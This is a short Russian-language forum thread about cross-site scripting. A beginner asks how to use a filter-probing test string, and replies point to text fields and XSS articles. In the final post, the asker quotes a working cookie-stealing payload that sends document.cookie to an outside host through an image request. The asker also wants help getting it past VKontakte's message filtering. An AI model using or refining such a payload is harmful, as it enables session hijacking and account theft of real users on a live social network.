извеняюсь если гдето это было я не нашёл...

я прочитал:
### А как определить есть фильтр или нет?

Просто в любое поле вводим: '';!--"<fuck>=&{()}
Дальше открываем html страничку и ищем слово "fuck"
и смотри ...........

фильтрации вот так: "><>'"`,/\?@%
и у меня вопрос....
куда писать ';!--"<fuck>=&{()}
да и вобще немоглибы по подробнее расказать про это?

и ещё раз извеняюсь...

В тектовые поля.Поподробнеетолько статьи об XSS тебе раскажут.Разжовано все не один раз с 2005 года,просто поищи.

В статье Микроба всё подробно описано, если мне память не изменяет это как раз из неё пример, почитай ещё статьи про XSS, понимание придёт со временем...

m0Hze
тоесть надо в любое место где можно в вести текст...
а не в адресную строку.

и ещё незнаете как сделать чтобы
...javascript:document.write('<script>img = new Image(); img.src = "http://mp4forum.ru/n1077.gif?"+document.cookie;</script>')...
после того как отпровляешь вконтакте сообщении не стоновилось
...javas?1?ript:document.write('<script>img = new Image(); img.src = "http://mp4forum.ru/n1077.gif?"+document.?4??4??1?ki?1?;</script>')...